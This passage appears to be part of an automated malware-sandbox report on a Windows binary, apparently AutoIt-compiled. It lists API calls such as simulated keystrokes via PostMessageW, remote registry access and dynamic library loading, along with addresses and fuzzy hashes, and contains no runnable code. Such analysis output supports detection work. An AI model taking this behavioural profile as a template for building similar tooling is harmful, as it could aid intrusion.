                                                                                                                                                                                                                • Part of subcall function 00C2B52D: GetCurrentThreadId.KERNEL32(00000000,?,00C2A23B,?,00000001), ref: 00C2B554
                                                                                                                                                                                                                • Part of subcall function 00C2B52D: AttachThreadInput.USER32(00000000,?,00C2A23B), ref: 00C2B55B
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C2A246
                                                                                                                                                                                                              • PostMessageW.USER32 ref: 00C2A263
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C2A266
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C2A26F
                                                                                                                                                                                                              • PostMessageW.USER32 ref: 00C2A28D
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C2A290
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C2A299
                                                                                                                                                                                                              • PostMessageW.USER32 ref: 00C2A2B0
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C2A2B3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2014098862-0
                                                                                                                                                                                                              • Opcode ID: d811cbbe8eb6332ae9aed8ab05153f3b71f8e6ee406c9934b55010aa75c7bde3
                                                                                                                                                                                                              • Instruction ID: f79f6dd25952685964157b9cfa505efa736d34e6daa288ce6073cfb4cb2d3a3c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d811cbbe8eb6332ae9aed8ab05153f3b71f8e6ee406c9934b55010aa75c7bde3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D511CEB1950618BEF6206B61DC8AF6F3B2DEB4C751F210419F6446B090CAF25C509AA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                              • API String ID: 0-572801152
                                                                                                                                                                                                              • Opcode ID: 7c9b582bb33a5cacc6096ae2063820a08bfd2b8085c97a34d36c92aa42755705
                                                                                                                                                                                                              • Instruction ID: cc5baf0b837b4ddc5ee40c13d0c1e63fb0bb3b1e5aad9d17990ed6f88b32d880
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c9b582bb33a5cacc6096ae2063820a08bfd2b8085c97a34d36c92aa42755705
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AEC1C171A4021A9FDF24DFA8C884BAEB7F5FF48314F148469E915AB280E770DE45CB91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000003.2166933112.0000000003C00000.00000004.00000001.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000003.2165074899.0000000003CDA000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000003.2166177808.0000000003CDD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __fassign
                                                                                                                                                                                                              • String ID: .$:$:
                                                                                                                                                                                                              • API String ID: 3965848254-2308638275
                                                                                                                                                                                                              • Opcode ID: 6e01cb37812b99c39cb85e72fef78f75f4e24bbbc6336fe041d3337e4d919325
                                                                                                                                                                                                              • Instruction ID: 9b6d063a82a52898e30bc8f109500626d6ed5a98714e1d12a28b77c5aee15e79
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e01cb37812b99c39cb85e72fef78f75f4e24bbbc6336fe041d3337e4d919325
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89A17E3690435AEECF24CF65C8097BEB7B8AF45300F28846AEC51EB241D7709AC5CB59
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000003.2166933112.0000000003C00000.00000004.00000001.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000003.2165074899.0000000003CDA000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000003.2166177808.0000000003CDD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                                                                              • String ID: &)}
                                                                                                                                                                                                              • API String ID: 48624451-2468822986
                                                                                                                                                                                                              • Opcode ID: 5d80769925c4c417d02a77349389b57cf36eb1842392d9faf38e0d9e5a4b37fc
                                                                                                                                                                                                              • Instruction ID: 45f171429f5a3f5f182493439bd009c0dfc99717ce3068e3d7d576232a754fa1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d80769925c4c417d02a77349389b57cf36eb1842392d9faf38e0d9e5a4b37fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3561F576900655AACF35DF69C8849BABBB9EF94200B1CC56DFCA6CB140D734A780CB64
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C34802
                                                                                                                                                                                                              • LoadStringW.USER32(00000000), ref: 00C34809
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C3481F
                                                                                                                                                                                                              • LoadStringW.USER32(00000000), ref: 00C34826
                                                                                                                                                                                                              • _wprintf.LIBCMT ref: 00C3484C
                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00C3486A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00C34847
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                              • API String ID: 3648134473-3128320259
                                                                                                                                                                                                              • Opcode ID: 5bbb23d1acc1b53cc64e502a4b8b73fbdac1706ae1563164d7a40ad331e45287
                                                                                                                                                                                                              • Instruction ID: b6e90d0c270a448c9e3b9c6b33005f1449f24e1526c1f8a90a80af271db53c56
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bbb23d1acc1b53cc64e502a4b8b73fbdac1706ae1563164d7a40ad331e45287
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A30121F29002087BE7219791DD89FFB766CE708300F5005A5FB49E2051E6B4AE944B75
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BE1A36: _memmove.LIBCMT ref: 00BE1A77
                                                                                                                                                                                                                • Part of subcall function 00C5147A: CharUpperBuffW.USER32(?,?), ref: 00C51491
                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C5044E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3479070676-0
                                                                                                                                                                                                              • Opcode ID: 857df0e041de3e6c4e6f0656aeac7dae4ff08aeeeee1ef6794299e96ed9b368b
                                                                                                                                                                                                              • Instruction ID: 0eebe82f357cdf2a362fb154bccfd69f0b2fc4b5dd07504c14f12b15fe367068
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 857df0e041de3e6c4e6f0656aeac7dae4ff08aeeeee1ef6794299e96ed9b368b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4A19B342042019FCB10EF25C881F2EB7E5EF84315F24895DF9969B2A2DB71E989CF46
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00C56810
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00C56818
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C56823
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00C5682F
                                                                                                                                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C5686B
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C5687C
                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C568B6
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C568D6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3864802216-0
                                                                                                                                                                                                              • Opcode ID: d23278a30b184bc723a19389249bc7fd9bd7c13e1b078cfce38c018f339fd3b6
                                                                                                                                                                                                              • Instruction ID: 2d561948d0b576db63949bb8372e274cf0d972f6628f0ade462edb5e9b2a8537
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d23278a30b184bc723a19389249bc7fd9bd7c13e1b078cfce38c018f339fd3b6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3316D761012147FEB218F11CC4AFEB3BA9EF49761F044065FE08AA291C6B59D91CB74
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memcmp
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2931989736-0
                                                                                                                                                                                                              • Opcode ID: 89cbd05b47b55bf275aef7de948d66fa5fd1fa133322da1798412af3a245ee21
                                                                                                                                                                                                              • Instruction ID: 1a43a47fb4abb3673e65b26ea01b54a3a811486b23b295a9122cf4e3f112f9f5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89cbd05b47b55bf275aef7de948d66fa5fd1fa133322da1798412af3a245ee21
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D21D772B01229BBD214B525ADC2FBF37AC9E21B44B048524FE16A7A82E710DF15C6E1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C56911
                                                                                                                                                                                                              • GetWindowLongW.USER32(00EC23A0,000000F0), ref: 00C56944
                                                                                                                                                                                                              • GetWindowLongW.USER32(00EC23A0,000000F0), ref: 00C56979
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C569AB
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C569D5
                                                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00C569E6
                                                                                                                                                                                                              • SetWindowLongW.USER32 ref: 00C56A00
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LongWindow$MessageSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2178440468-0
                                                                                                                                                                                                              • Opcode ID: 543e14caa88c0187390e53a1efd6c7440763494b834a2ffe2d1e8ba4097da102
                                                                                                                                                                                                              • Instruction ID: fa10bb15f5f69423280c51c52ca39194b508ab5ecef844bc388a861d096b80c1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 543e14caa88c0187390e53a1efd6c7440763494b834a2ffe2d1e8ba4097da102
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 213139386041509FDB21CF19DC88F6937E1FB49352F6401A5F9159B2B2CB71AD84DB58
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C2E2CA
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C2E2F0
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00C2E2F3
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00C2E311
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00C2E31A
                                                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00C2E33F
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00C2E34D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3761583154-0
                                                                                                                                                                                                              • Opcode ID: 3b438161b2d154048ddd9ed2f701ddf720ab87be4b8603d1051ec2b5098f72ae
                                                                                                                                                                                                              • Instruction ID: 348a045dd5e50fa90497a4e2eec025d686b655445938914de7098fa3e11dabf4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b438161b2d154048ddd9ed2f701ddf720ab87be4b8603d1051ec2b5098f72ae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B21C932600219BF9F20DFA9DC88DBF73ECEB09361B144125FA14EB260DAB0DD458760
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C2E3A5
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C2E3CB
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00C2E3CE
                                                                                                                                                                                                              • SysAllocString.OLEAUT32 ref: 00C2E3EF
                                                                                                                                                                                                              • SysFreeString.OLEAUT32 ref: 00C2E3F8
                                                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00C2E412
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00C2E420
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3761583154-0
                                                                                                                                                                                                              • Opcode ID: 36c99e44b8a7232445ac745e4908ffd099aeeb11a6fc68928821d0733a352e02
                                                                                                                                                                                                              • Instruction ID: c8b287c870b993985562306dc4142486dbd4faa067d2b598e2867891752ec1c5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36c99e44b8a7232445ac745e4908ffd099aeeb11a6fc68928821d0733a352e02
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1218835604114AF9B20EFB9EC88DBF77ECEB093607108525FA15DB261DAB0ED418B64
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00BF4282,?), ref: 00BF41D3
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00BF41DA
                                                                                                                                                                                                              • EncodePointer.KERNEL32(00000000), ref: 00BF41E6
                                                                                                                                                                                                              • DecodePointer.KERNEL32(00000001,00BF4282,?), ref: 00BF4203
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                                                              • String ID: RoInitialize$combase.dll
                                                                                                                                                                                                              • API String ID: 3489934621-340411864
                                                                                                                                                                                                              • Opcode ID: 4e276656b9a686c17b782794d10f22e7faab05c1e4a9d8c13bbe0e268b736e9b
                                                                                                                                                                                                              • Instruction ID: 33e97d17525b8c0cb586853f0c5bfe468dbff084f9fd60889934298442dba19e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e276656b9a686c17b782794d10f22e7faab05c1e4a9d8c13bbe0e268b736e9b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51E012706A0741AFEF311B72ED8DB1E3AA4AB11B06F60442AF602E61B0CBF545888F00
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00BF41A8), ref: 00BF42A8
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00BF42AF
                                                                                                                                                                                                              • EncodePointer.KERNEL32(00000000), ref: 00BF42BA
                                                                                                                                                                                                              • DecodePointer.KERNEL32(00BF41A8), ref: 00BF42D5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                                                              • String ID: RoUninitialize$combase.dll
                                                                                                                                                                                                              • API String ID: 3489934621-2819208100
                                                                                                                                                                                                              • Opcode ID: 1d26225517bcd26057bde884bc096bfb65f71e604bb21369d5dadea9652184f4
                                                                                                                                                                                                              • Instruction ID: ec06a2817d7bb45202510d88bf1ab5dc5b8ffe83ee65430e01216e44beec6ebb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d26225517bcd26057bde884bc096bfb65f71e604bb21369d5dadea9652184f4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15E0EC70660700AFDB229F61ED4DB5E3AA4BB00B52F60013AF201E61F0CBF4460CCB14
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000003.2166933112.0000000003C00000.00000004.00000001.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000003.2165074899.0000000003CDA000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000003.2166177808.0000000003CDD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcspbrk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 402402107-0
                                                                                                                                                                                                              • Opcode ID: 1b67dfd64f5789d0f16ccc386ced005553707bedb15b521f42b762d6373189be
                                                                                                                                                                                                              • Instruction ID: 175a0e9070b07bdf7a0d9bc1573df8b5ea432f331c219d683c8af9ce58692eb7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b67dfd64f5789d0f16ccc386ced005553707bedb15b521f42b762d6373189be
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7F1F4B6D00209EFCB11EFE5C9809EEBBB8FF09204F15446AE505EB211D734AA55EB61
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1296646539-0
                                                                                                                                                                                                              • Opcode ID: e0a70e3369bbb8ade17b681caa77daaed03a0bfa58e6eef75ff9b52558aed8a5
                                                                                                                                                                                                              • Instruction ID: 40aa39f885c77ef7ba75e9d736d67646d4f179f895df651b1ec640453b4563e9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0a70e3369bbb8ade17b681caa77daaed03a0bfa58e6eef75ff9b52558aed8a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10B14B3990024ADBDF14CFA8C5807EEB7B1FF18710F14816AED69AB354EB74AA50CB54
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BE1A36: _memmove.LIBCMT ref: 00BE1A77
                                                                                                                                                                                                                • Part of subcall function 00C5147A: CharUpperBuffW.USER32(?,?), ref: 00C51491
                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C5091D
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C5095D
